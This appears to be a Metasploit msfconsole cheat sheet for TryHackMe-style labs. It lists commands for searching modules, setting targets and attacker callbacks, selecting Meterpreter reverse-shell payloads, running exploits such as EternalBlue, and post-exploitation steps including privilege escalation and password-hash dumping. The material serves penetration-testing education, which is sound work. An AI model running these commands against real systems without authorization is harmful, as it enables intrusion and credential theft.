Metasploit msfconsole Cheat Sheet
Overview
This cheat sheet provides a quick reference for commonly used Metasploit Framework and msfconsole commands.
Use these commands only in authorized labs, penetration tests, and systems you have permission to assess.
Start Metasploit
Launch the Metasploit console:
msfconsole
Start without displaying the banner:
msfconsole -q
Display command-line options:
msfconsole -h
Basic Console Commands
Display available commands:
help
Display information about a specific command:
help search
Clear the console:
clear
Exit Metasploit:
exit
Return to the previous menu:
back
Search for Modules
Search by service or keyword:
search smb
search apache
search ftp
Search by CVE:
search cve:2021-44228
Search for exploit modules:
search type:exploit
Search for auxiliary modules:
search type:auxiliary
Search by platform:
search platform:windows
Search using multiple filters:
search type:exploit platform:linux
Select a Module
Load a module by its full name:
use exploit/windows/smb/ms17_010_eternalblue
Load a module by its search result number:
use 0
Display the currently selected module:
show options
Return to the main console:
back
View Module Information
Display detailed information about the selected module:
info
Display information without loading the module:
info exploit/windows/smb/ms17_010_eternalblue
Display required and optional settings:
show options
Display advanced settings:
show advanced
Display compatible payloads:
show payloads
Display supported targets:
show targets
Display available actions:
show actions
Configure the Target
Set a single target:
set RHOSTS <TARGET_IP>
Example:
set RHOSTS 10.10.10.10
Set multiple targets:
set RHOSTS 10.10.10.10,10.10.10.11
Set a target range:
set RHOSTS 10.10.10.10-20
Set a CIDR network:
set RHOSTS 192.168.1.0/24
Set the target service port:
set RPORT <PORT>
Example:
set RPORT 445
Configure the Callback
Set the local callback address using an interface:
set LHOST tun0
Set the callback address using an IP address:
set LHOST <ATTACKER_IP>
Example:
set LHOST 10.8.0.5
Set the callback port:
set LPORT 4444
On TryHackMe,
LHOSTis commonly set to the VPN interface or the IP address assigned to that interface.
View Network Interfaces
Exit to a local shell temporarily:
shell
View Linux interfaces:
ip addr
Return to Metasploit:
exit
You can also run a local command without leaving msfconsole:
ip addr
Some local commands may need to be prefixed with:
! ip addr
Configure Payloads
Display compatible payloads:
show payloads
Select a Windows Meterpreter reverse shell:
set payload windows/x64/meterpreter/reverse_tcp
Select a Linux Meterpreter reverse shell:
set payload linux/x64/meterpreter/reverse_tcp
Select a standard Linux reverse shell:
set payload linux/x64/shell_reverse_tcp
Display payload options:
show options
Remove the selected payload:
unset payload
Set and Unset Options
Set an option:
set OPTION VALUE
Example:
set RPORT 445
Display a configured option:
get RHOSTS
Remove an option:
unset RHOSTS
Remove all configured options:
unset all
Global Options
Set an option globally:
setg LHOST tun0
Set a global target:
setg RHOSTS <TARGET_IP>
View global settings:
getg
Remove a global setting:
unsetg LHOST
Remove all global settings:
unsetg all
Global options remain available when switching between modules.
Validate the Configuration
Review configured options:
show options
Check whether the module supports the target:
check
Some modules do not support the check command.
Run a Module
Run the selected module:
run
Run an exploit:
exploit
Run the exploit as a background job:
exploit -j
Run without automatically interacting with the session:
exploit -z
Run as a background job without automatically opening the session:
exploit -j -z
Manage Sessions
List active sessions:
sessions
Display detailed session information:
sessions -v
Interact with session 1:
sessions -i 1
Rename a session:
sessions -n web-server -i 1
Background the current session:
background
You can also background a Meterpreter session with:
Ctrl+Z
Kill a specific session:
sessions -k 1
Kill all sessions:
sessions -K
Run a command across all sessions:
sessions -C <COMMAND>
Manage Jobs
List background jobs:
jobs
Display detailed job information:
jobs -v
Stop a specific job:
jobs -k 0
Stop all jobs:
jobs -K
Meterpreter System Information
Display Meterpreter help:
help
Display system information:
sysinfo
Display the current user:
getuid
Display the process ID:
getpid
Display network interfaces:
ipconfig
Display the routing table:
route
Meterpreter File Commands
Display the current directory:
pwd
List files:
ls
Change directories:
cd <DIRECTORY>
Read a text file:
cat <FILE>
Download a file:
download <REMOTE_FILE>
Upload a file:
upload <LOCAL_FILE>
Create a directory:
mkdir <DIRECTORY>
Delete a file:
rm <FILE>
Search for a file:
search -f <FILENAME>
Example:
search -f *.txt
Meterpreter Process Commands
List running processes:
ps
Display the current process ID:
getpid
Migrate into another process:
migrate <PID>
Execute a process:
execute -f <PROGRAM>
Example:
execute -f cmd.exe
Meterpreter Shell Access
Open a system shell:
shell
Return from the system shell to Meterpreter:
exit
Background Meterpreter:
background
Meterpreter Privilege Commands
Attempt to elevate privileges:
getsystem
Check the current user:
getuid
Display Windows privileges:
getprivs
Dump password hashes when authorized and supported:
hashdump
Commands such as
getsystemandhashdumpdepend on the session type, operating system, privileges, and security controls present on the target.
Post-Exploitation Modules
Background the active session:
background
Search for post-exploitation modules:
search type:post
Load a post-exploitation module:
use post/<MODULE_PATH>
Display module options:
show options
Set the session:
set SESSION 1
Run the module:
run
Auxiliary Scanner Workflow
Search for a scanner:
search type:auxiliary scanner smb
Select the module:
use auxiliary/scanner/smb/smb_version
Set the target:
set RHOSTS <TARGET_IP>
Review options:
show options
Run the scanner:
run
Workspaces
List workspaces:
workspace
Create a workspace:
workspace -a <WORKSPACE_NAME>
Example:
workspace -a TryHackMe
Switch workspaces:
workspace TryHackMe
Delete a workspace:
workspace -d TryHackMe
Rename a workspace:
workspace -r TryHackMe THM-Labs
Metasploit Database Commands
Check database status:
db_status
Display discovered hosts:
hosts
Display discovered services:
services
Display stored credentials:
creds
Display collected loot:
loot
Display notes:
notes
Import Nmap Results
Run Nmap from Metasploit and store the results:
db_nmap -sC -sV <TARGET_IP>
Import an existing Nmap XML file:
db_import scan.xml
Display imported hosts:
hosts
Display imported services:
services
Save Commands to a Resource Script
Create a resource file:
nano setup.rc
Example contents:
use exploit/<MODULE_PATH>
set RHOSTS <TARGET_IP>
set LHOST tun0
set LPORT 4444
show options
Run the resource script:
msfconsole -r setup.rc
Run it from inside msfconsole:
resource setup.rc
Typical Exploit Workflow
search <SERVICE_OR_VULNERABILITY>
info <MODULE>
use <MODULE>
show options
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST tun0
show payloads
set payload <PAYLOAD>
check
run
sessions
sessions -i 1
Common Mistakes
- Setting
LHOSTto the target IP instead of the attack machine’s IP - Using the wrong VPN interface
- Forgetting to configure
RHOSTS - Selecting a payload that is incompatible with the target
- Running an exploit before reviewing
info - Skipping service and version enumeration
- Assuming every module supports
check - Forgetting that reverse payloads require the target to connect back
- Leaving global options configured from a previous lab
- Using Metasploit against systems without authorization
Quick Troubleshooting
Review all settings:
show options
Verify the callback interface:
! ip addr
Check the selected payload:
show payloads
Display the current target:
get RHOSTS
Display the callback address:
get LHOST
Remove an incorrect global setting:
unsetg LHOST
List active listeners and jobs:
jobs
List active sessions:
sessions
Key Takeaways
- Use
search,info, andshow optionsbefore running a module. RHOSTSidentifies the target.LHOSTidentifies the attack machine’s callback address.show payloadsdisplays payloads compatible with the selected module.- Use
checkwhen supported before attempting exploitation. - Use
sessionsto manage shells and Meterpreter sessions. - Use workspaces to keep lab and assessment data organized.
- Always perform accurate enumeration before selecting an exploit.